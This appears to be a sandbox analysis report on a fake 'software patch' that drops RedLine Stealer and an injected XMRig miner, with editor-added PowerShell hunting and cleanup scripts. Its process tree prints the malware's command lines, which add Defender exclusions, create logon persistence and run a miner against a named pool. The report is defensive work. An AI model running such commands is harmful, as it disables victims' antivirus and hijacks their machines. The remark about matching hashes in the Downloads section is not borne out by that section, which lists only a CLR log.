Analysis

max time kernel: 151s
max time network: 139s
platform: windows10_x64
resource: win10-en-20211014
submitted: 21-10-2021 13:52

Static task: static1
Behavioral task: behavioral1
Sample: Software patch by Sylox.exe
Resource: win7-en-20210920
General

Target: Software patch by Sylox.exe
Size: 3.2MB
MD5: 32da7dfc115619bf8a6197ec22b75edf
SHA1: 6118bde049e88592ff92464788c63992a96ece13
SHA256: ea152bfedb88c978ab9730ab0f6c9f4baed1777e33d5a6e25c3d542b5c39bb61
SHA512: c2a522312fe8bcbe092c6dd46e6e34c53e0d9bf58bccea1f9de1e96b06c0f08d452e0c000a46f34b1cc5bbe22df866243edd17450c1a2ddf43854ddba26864a1
Malware Config

Extracted: redline
Botnet: @faqu_1
C2: 95.181.152.6:46927
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (2 IoCs)
resource | yara_rule
behavioral2/memory/1828-136-0x0000000000470000-0x000000000049E000-memory.dmp | family_redline
behavioral2/memory/1828-142-0x0000000000A60000-0x0000000000A79000-memory.dmp | family_redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

XMRig Miner Payload (2 IoCs)
resource | yara_rule
behavioral2/memory/4220-491-0x000000014030F3F8-mapping.dmp | xmrig
behavioral2/memory/4220-496-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
Downloads MZ/PE file

Executes dropped EXE (7 IoCs)
pid | process
4060 | Datafile32.exe
3196 | Datafile64.exe
1828 | Server32.exe
1412 | services32.exe
2228 | services64.exe
584 | sihost32.exe
5044 | sihost64.exe

Checks BIOS information in registry (2 TTPs, 10 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | services32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | services32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Software patch by Sylox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Datafile32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Datafile32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | services64.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | services64.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Software patch by Sylox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Datafile64.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Datafile64.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Themida packer
The YARA rule `themida` matched both droppers, their System32 copies and the parent's memory; Themida is a commercial software-protection packer, so the static view of these files shows the protector, not the payload.
resource | yara_rule
behavioral2/memory/4392-118-0x0000000000FA0000-0x0000000000FA1000-memory.dmp | themida
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe | themida
behavioral2/memory/4060-125-0x0000000000400000-0x0000000000E48000-memory.dmp | themida
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe | themida
behavioral2/memory/3196-133-0x0000000000400000-0x0000000000EAE000-memory.dmp | themida
C:\Windows\System32\services32.exe | themida
C:\Windows\System32\services64.exe | themida

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled
(The signature name is the one shown for these processes in the process tree; the listing below reads the EnableLUA policy value.)
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Software patch by Sylox.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Datafile32.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Datafile64.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | services32.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | services64.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Drops file in System32 directory (7 IoCs)
description | ioc | process
File opened for modification | C:\Windows\system32\services32.exe | conhost.exe
File created | C:\Windows\system32\services64.exe | conhost.exe
File opened for modification | C:\Windows\system32\services64.exe | conhost.exe
File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | conhost.exe
File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | conhost.exe
File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | conhost.exe
File created | C:\Windows\system32\services32.exe | conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (5 IoCs)
pid | process
4392 | Software patch by Sylox.exe
4060 | Datafile32.exe
3196 | Datafile64.exe
1412 | services32.exe
2228 | services64.exe

Suspicious use of SetThreadContext (1 IoC)
description | pid | process | target process
PID 2036 set thread context of 4220 | 2036 | conhost.exe | nslookup.exe
The target, nslookup.exe (PID 4220), is the same process that receives five WriteProcessMemory calls from conhost.exe 2036 (table below) and whose memory matches the xmrig YARA rule at 0x140000000-0x140786000, the default image base of a 64-bit PE. Taken together this is the process-hollowing pattern: a legitimate binary started suspended, its image overwritten with the miner, and its thread context redirected to the new entry point. No modified nslookup.exe appears among the dropped files, so the miner exists only in that process's memory.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
That last sentence is the sandbox's generic description for this signature; nothing else in this report (no mass file modification, no ransom note) supports ransomware, and drive enumeration is also routine for a stealer collecting files.

Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | process
3212 | schtasks.exe
4788 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | process | hits
1828 | Server32.exe | 1
1352 | conhost.exe | 1
2272 | powershell.exe | 3
4712 | conhost.exe | 1
4144 | powershell.exe | 3
2412 | powershell.exe | 3
2904 | powershell.exe | 3
4080 | conhost.exe | 2
3208 | powershell.exe | 3
2036 | conhost.exe | 2
4320 | powershell.exe | 3
4748 | powershell.exe | 3
4220 | nslookup.exe | 33
1524 | powershell.exe | 3
(the "hits" column counts repeated entries for the same process in the source listing; 64 in total)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Token | pid | process
SeDebugPrivilege | 4392 | Software patch by Sylox.exe
SeDebugPrivilege | 1828 | Server32.exe
SeDebugPrivilege | 1352 | conhost.exe
SeDebugPrivilege | 2272 | powershell.exe
SeDebugPrivilege | 4712 | conhost.exe
SeDebugPrivilege | 4144 | powershell.exe
Then, first for powershell.exe 2272 and again for powershell.exe 4144, the same 21 tokens in this order:
SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
SeDebugPrivilege | 2412 | powershell.exe
SeDebugPrivilege | 2904 | powershell.exe
powershell.exe 2412: SeIncreaseQuotaPrivilege through SeSystemEnvironmentPrivilege (the first 14 of the same sequence); the listing ends there at 64 entries.
The numeric tokens are privilege LUIDs the sandbox did not resolve to names: 33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege, 36 = SeDelegateSessionUserImpersonatePrivilege. The sweep through every privilege on the token is what an elevated powershell.exe does; it shows the Add-MpPreference commands ran with an administrator token, which they need in order to change Defender's exclusions.
Suspicious use of WriteProcessMemory (64 IoCs)
pid | process | target pid | target process | writes
4392 | Software patch by Sylox.exe | 4060 | Datafile32.exe | 2
4392 | Software patch by Sylox.exe | 3196 | Datafile64.exe | 2
4392 | Software patch by Sylox.exe | 1828 | Server32.exe | 3
4060 | Datafile32.exe | 1352 | conhost.exe | 3
1352 | conhost.exe | 1912 | cmd.exe | 2
1912 | cmd.exe | 2272 | powershell.exe | 2
1352 | conhost.exe | 2836 | cmd.exe | 2
2836 | cmd.exe | 3212 | schtasks.exe | 2
3196 | Datafile64.exe | 4712 | conhost.exe | 3
4712 | conhost.exe | 4968 | cmd.exe | 2
4968 | cmd.exe | 4144 | powershell.exe | 2
4712 | conhost.exe | 2312 | cmd.exe | 2
2312 | cmd.exe | 4788 | schtasks.exe | 2
4968 | cmd.exe | 2412 | powershell.exe | 2
1912 | cmd.exe | 2904 | powershell.exe | 2
1352 | conhost.exe | 3252 | cmd.exe | 2
3252 | cmd.exe | 1412 | services32.exe | 2
4712 | conhost.exe | 1056 | cmd.exe | 2
1056 | cmd.exe | 2228 | services64.exe | 2
1412 | services32.exe | 4080 | conhost.exe | 3
4080 | conhost.exe | 3812 | cmd.exe | 2
3812 | cmd.exe | 3208 | powershell.exe | 2
4080 | conhost.exe | 584 | sihost32.exe | 2
2228 | services64.exe | 2036 | conhost.exe | 3
2036 | conhost.exe | 2884 | cmd.exe | 2
2884 | cmd.exe | 4320 | powershell.exe | 2
2036 | conhost.exe | 5044 | sihost64.exe | 2
2036 | conhost.exe | 4220 | nslookup.exe | 5
(rows in the order first reported; the "writes" column counts identical consecutive entries in the source listing, 64 in total)
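The signatures above boil down to four behaviours that leave event-log evidence on a real host: Defender exclusions being added, a scheduled task named services32/services64 being registered, PowerShell being launched with an Add-MpPreference command line, and nslookup.exe being launched with XMRig/cinit switches. The script below is an added example by the editor, not part of the sandbox report, that hunts for those four across the logs where they land. It assumes the default log names; the Security 4698 task-creation and 4688 process-creation events only exist if "Audit Other Object Access Events" and command-line auditing are enabled, the TaskScheduler/Operational log is off by default, and the Sysmon log exists only where Sysmon is installed, so a missing log is treated as "no data" rather than an error.

```powershell
# Added example (editor's code, not part of the sandbox report): hunt Windows event logs
# for the behaviours the signatures describe. Run in an elevated PowerShell.
param([datetime]$Since = (Get-Date).AddDays(-7))

# Patterns taken from the report: task names, the pool host, the cinit launcher switches,
# and the Defender cmdlet the droppers run.
$TaskNameRx = '\\?(services32|services64)\b'
$MinerCmdRx = '--cinit-|--randomx|--algo=|hashvault\.pro'
$ExclCmdRx  = 'Add-MpPreference\s+-Exclusion(Path|Extension)'

function Get-Events {
    # A log that is absent, disabled or empty must not abort the hunt.
    param([hashtable]$Filter)
    try { Get-WinEvent -FilterHashtable $Filter -ErrorAction Stop } catch { @() }
}

$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding {
    param([string]$Kind, $Event, [string]$Detail)
    $findings.Add([pscustomobject]@{
        Time = $Event.TimeCreated; Log = $Event.LogName; EventId = $Event.Id; Kind = $Kind; Detail = $Detail
    })
}

# 1. Defender exclusion changes. Event 5007 ("configuration changed") carries the registry value
#    that changed, e.g. ...\Exclusions\Paths\C:\Users\Admin = 0x0 or ...\Exclusions\Extensions\exe.
Get-Events @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007; StartTime = $Since } |
    Where-Object { $_.Message -match 'Exclusions\\(Paths|Extensions)\\' } |
    ForEach-Object {
        $ev  = $_
        $new = ($ev.Message -split '\r?\n' | Where-Object { $_ -match 'New value' }) -join ' '
        Add-Finding -Kind 'Defender exclusion added' -Event $ev -Detail $new.Trim()
    }

# 2. Scheduled task registration: TaskScheduler/Operational 106 (if enabled) and Security 4698.
foreach ($f in @(
        @{ LogName = 'Microsoft-Windows-TaskScheduler/Operational'; Id = 106;  StartTime = $Since },
        @{ LogName = 'Security';                                    Id = 4698; StartTime = $Since })) {
    Get-Events $f | Where-Object { $_.Message -match $TaskNameRx } | ForEach-Object {
        Add-Finding -Kind 'Task services32/services64 registered' -Event $_ -Detail (($_.Message -split '\r?\n')[0].Trim())
    }
}

# 3. Process creation: Sysmon event 1 ("CommandLine:") or Security 4688 ("Process Command Line:").
#    Flags the Add-MpPreference chains and the miner command line given to nslookup.exe.
foreach ($f in @(
        @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1;    StartTime = $Since },
        @{ LogName = 'Security';                             Id = 4688; StartTime = $Since })) {
    Get-Events $f | ForEach-Object {
        $ev  = $_
        $cmd = ($ev.Message -split '\r?\n' | Where-Object { $_ -match '^\s*(CommandLine|Process Command Line):' }) -join ' '
        if     ($cmd -match $MinerCmdRx) { Add-Finding -Kind 'Miner command line (XMRig/cinit)'  -Event $ev -Detail $cmd.Trim() }
        elseif ($cmd -match $ExclCmdRx)  { Add-Finding -Kind 'Defender exclusion via PowerShell' -Event $ev -Detail $cmd.Trim() }
    }
}

$findings | Sort-Object Time | Format-Table -AutoSize -Wrap
```

Run it as `.\hunt.ps1 -Since (Get-Date).AddDays(-30)` to widen the window. The 5007 check is the most reliable of the four because Defender writes it regardless of audit policy and the sample's exclusions (profile root, Temp, %SystemRoot%, drive roots, *.exe and *.dll) are never legitimate; treat any hit there as a compromise until proven otherwise.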
Processes
(Indentation is spawn depth as reported; PIDs are cross-referenced from the signature tables above. Where two powershell.exe siblings share one cmd.exe parent, the ExclusionPath command is the one cmd runs first, so it takes the PID that appears first in the WriteProcessMemory table. Nodes without a PID do not appear in the capped tables.)

[1] C:\Users\Admin\AppData\Local\Temp\Software patch by Sylox.exe  (PID 4392)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Software patch by Sylox.exe"
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Temp\Datafile32.exe  (PID 4060)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\conhost.exe  (PID 1352)
        cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\System32\cmd.exe  (PID 1912)
          cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2272)
            cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2904)
            cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\System32\cmd.exe  (PID 2836)
          cmdline: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\schtasks.exe  (PID 3212)
            cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
            - Creates scheduled task(s)

      [4] C:\Windows\System32\cmd.exe  (PID 3252)
          cmdline: "cmd" cmd /c "C:\Windows\system32\services32.exe"
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\services32.exe  (PID 1412)
            cmdline: C:\Windows\system32\services32.exe
            - Executes dropped EXE
            - Checks BIOS information in registry
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\System32\conhost.exe  (PID 4080)
              cmdline: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
              - Drops file in System32 directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of WriteProcessMemory

            [7] C:\Windows\System32\cmd.exe  (PID 3812)
                cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                - Suspicious use of WriteProcessMemory

              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3208)
                  cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  - Suspicious behavior: EnumeratesProcesses

              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  - Suspicious behavior: EnumeratesProcesses

            [7] C:\Windows\system32\Microsoft\Telemetry\sihost32.exe  (PID 584)
                cmdline: "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                - Executes dropped EXE

              [8] C:\Windows\System32\conhost.exe
                  cmdline: "C:\Windows\System32\conhost.exe" "/sihost32"

  [2] C:\Users\Admin\AppData\Local\Temp\Datafile64.exe  (PID 3196)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\conhost.exe  (PID 4712)
        cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\System32\cmd.exe  (PID 4968)
          cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4144)
            cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2412)
            cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\System32\cmd.exe  (PID 2312)
          cmdline: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\schtasks.exe  (PID 4788)
            cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
            - Creates scheduled task(s)

      [4] C:\Windows\System32\cmd.exe  (PID 1056)
          cmdline: "cmd" cmd /c "C:\Windows\system32\services64.exe"
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\services64.exe  (PID 2228)
            cmdline: C:\Windows\system32\services64.exe
            - Executes dropped EXE
            - Checks BIOS information in registry
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\System32\conhost.exe  (PID 2036)
              cmdline: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
              - Drops file in System32 directory
              - Suspicious use of SetThreadContext
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of WriteProcessMemory

            [7] C:\Windows\System32\cmd.exe  (PID 2884)
                cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                - Suspicious use of WriteProcessMemory

              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4320)
                  cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  - Suspicious behavior: EnumeratesProcesses

              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  - Suspicious behavior: EnumeratesProcesses

            [7] C:\Windows\system32\Microsoft\Libs\sihost64.exe  (PID 5044)
                cmdline: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                - Executes dropped EXE

              [8] C:\Windows\System32\conhost.exe
                  cmdline: "C:\Windows\System32\conhost.exe" "/sihost64"

            [7] C:\Windows\System32\nslookup.exe  (PID 4220)
                cmdline: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="<removed>" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                - Suspicious behavior: EnumeratesProcesses

  [2] C:\Users\Admin\AppData\Local\Temp\Server32.exe  (PID 1828)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Server32.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
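Read top to bottom, the tree shows the whole chain. `Software patch by Sylox.exe` (PID 4392) writes three children into the user's Temp folder: Datafile32.exe and Datafile64.exe (both Themida-packed, per the YARA hits) and Server32.exe, the RedLine payload that the family_redline rule matched in PID 1828's memory. Each Datafile*.exe hands off to a process named conhost.exe which disables Defender coverage for the profile, Temp, %SystemRoot% and the drive roots plus every .exe and .dll, registers an onlogon task at the highest run level, and relaunches the same binary from System32 as services32.exe/services64.exe (the Downloads section shows identical hashes for the Temp and System32 copies). The System32 copies repeat the Defender step, drop sihost32.exe/sihost64.exe under System32\Microsoft\Telemetry and System32\Microsoft\Libs together with WR64.sys, and the 64-bit branch starts nslookup.exe with an XMRig command line (RandomX, pool.hashvault.pro:80); the SetThreadContext and WriteProcessMemory signatures against PID 4220 plus the xmrig YARA hits in its memory show the miner was injected into that nslookup.exe. The CLR usage log `conhost.exe.log` under Downloads means managed code ran inside a process named conhost.exe, which is consistent with the droppers injecting a .NET stage into a conhost.exe process rather than the console host doing its normal job.

The script below is an added example by the editor, not part of the sandbox report, that checks a live host for exactly those leftovers and, with `-Remediate`, removes them. Hashes, paths, task names and the C2 address are copied from this report; the exclusion-path heuristic (drive roots, %SystemRoot%, profile roots, AppData and Temp are never legitimate exclusions) and the script structure are the editor's assumptions. It does not handle WR64.sys being loaded as a kernel driver; if the file removal fails for that reason, the driver service has to be stopped first.

```powershell
# Added example (editor's code, not part of the sandbox report): triage a Windows host for the
# artefacts this sample leaves behind and, with -Remediate, undo them. Run elevated.
param([switch]$Remediate)

# Indicators copied from the report.
$KnownSha256 = @{
    'e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038' = 'Datafile32.exe / services32.exe'
    '5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c' = 'Datafile64.exe / services64.exe'
    'fe528fc9917783284421b45f302fc62f5058d40a9156fabeed1f7771478b24c8' = 'Server32.exe (RedLine)'
    '145a18732aa1c09bf0a1e79193bed6c6d0fb51b7825c67828616fffe8d359e3d' = 'sihost32.exe'
    '873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea' = 'sihost64.exe'
}
$DropPaths = @(
    "$env:SystemRoot\System32\services32.exe"
    "$env:SystemRoot\System32\services64.exe"
    "$env:SystemRoot\System32\Microsoft\Telemetry\sihost32.exe"
    "$env:SystemRoot\System32\Microsoft\Libs\sihost64.exe"
    "$env:SystemRoot\System32\Microsoft\Libs\WR64.sys"
)
$TaskNames  = 'services32', 'services64'
$ProcNames  = 'services32.exe', 'services64.exe', 'sihost32.exe', 'sihost64.exe'
$C2Address  = '95.181.152.6'             # RedLine C2 from the extracted config
$MinerCmdRx = '--cinit-|hashvault\.pro'  # switches seen on the nslookup.exe command line

$report = [System.Collections.Generic.List[object]]::new()
function Note([string]$Finding, [string]$Where, [string]$Action) {
    $report.Add([pscustomobject]@{ Finding = $Finding; Where = $Where; Action = $Action })
}

# 1. Running processes first, so files are not locked when we remove them: the System32 copies
#    of the droppers, and any nslookup.exe carrying the miner's command line (hollowed process).
foreach ($p in Get-CimInstance Win32_Process) {
    $isDropper = $p.Name -in $ProcNames
    $isMiner   = ($p.Name -eq 'nslookup.exe') -and ($p.CommandLine -match $MinerCmdRx)
    if (-not ($isDropper -or $isMiner)) { continue }
    $action = 'reported'
    if ($Remediate) { Stop-Process -Id $p.ProcessId -Force; $action = 'stopped' }
    Note 'Process' "$($p.Name) pid $($p.ProcessId) :: $($p.CommandLine)" $action
}

# 2. Persistence: onlogon tasks at highest run level pointing at the System32 copies.
foreach ($t in $TaskNames) {
    $task = Get-ScheduledTask -TaskName $t -ErrorAction SilentlyContinue
    if (-not $task) { continue }
    $exe = ($task.Actions | ForEach-Object { $_.Execute }) -join ';'
    $action = 'reported'
    if ($Remediate) { Unregister-ScheduledTask -TaskName $t -Confirm:$false; $action = 'unregistered' }
    Note 'Scheduled task' "\$t -> $exe" $action
}

# 3. Dropped files: hash anything present against the report's SHA256s, then remove on request.
foreach ($f in $DropPaths) {
    if (-not (Test-Path -LiteralPath $f)) { continue }
    $sha   = (Get-FileHash -LiteralPath $f -Algorithm SHA256).Hash.ToLower()
    $label = if ($KnownSha256.ContainsKey($sha)) { "SHA256 matches report ($($KnownSha256[$sha]))" } else { "SHA256 $sha not in report" }
    $action = 'reported'
    if ($Remediate) {
        try   { Remove-Item -LiteralPath $f -Force -ErrorAction Stop; $action = 'removed' }
        catch { $action = "removal failed: $($_.Exception.Message)" }   # e.g. WR64.sys still loaded
    }
    Note 'Dropped file' $f "$label; $action"
}

# 4. Defender exclusions. Heuristic (editor's assumption, not from the report): a drive root,
#    %SystemRoot%, a user profile root, AppData or Temp is never a legitimate exclusion path.
#    The sample excluded exactly these ($pwd, %UserProfile%, %AppData%, %Temp%, %SystemRoot%,
#    %HomeDrive%, %SystemDrive%) plus the exe and dll extensions.
$mp = Get-MpPreference
$badPathRx = '^(?:[a-z]:\\?|' + [regex]::Escape($env:SystemRoot) + '\\?|[a-z]:\\Users\\[^\\]+(?:\\AppData(?:\\(?:Roaming|Local)(?:\\Temp)?)?)?\\?)$'
foreach ($x in (@($mp.ExclusionPath) | Where-Object { $_ -and ($_ -match $badPathRx) })) {
    $action = 'reported'
    if ($Remediate) { Remove-MpPreference -ExclusionPath $x; $action = 'removed' }
    Note 'Defender exclusion path' $x $action
}
foreach ($e in (@($mp.ExclusionExtension) | Where-Object { $_ -in 'exe', 'dll' })) {
    $action = 'reported'
    if ($Remediate) { Remove-MpPreference -ExclusionExtension $e; $action = 'removed' }
    Note 'Defender exclusion extension' $e $action
}

# 5. Live network: any socket to the RedLine C2 (the miner pool is resolved by name, so check DNS logs for it).
Get-NetTCPConnection -RemoteAddress $C2Address -ErrorAction SilentlyContinue | ForEach-Object {
    Note 'C2 connection' "$($_.LocalAddress):$($_.LocalPort) -> $($_.RemoteAddress):$($_.RemotePort) pid $($_.OwningProcess)" 'reported'
}

$report | Format-Table -AutoSize -Wrap
```

Run it once without `-Remediate`, read the table, then rerun with the switch. Because the tasks run at logon with the highest run level and the System32 copies re-drop the sihost*.exe files, check the host again after a reboot; a clean second pass is the real confirmation.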
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
  MD5    84f2160705ac9a032c002f966498ef74
  SHA1   e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
  SHA256 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
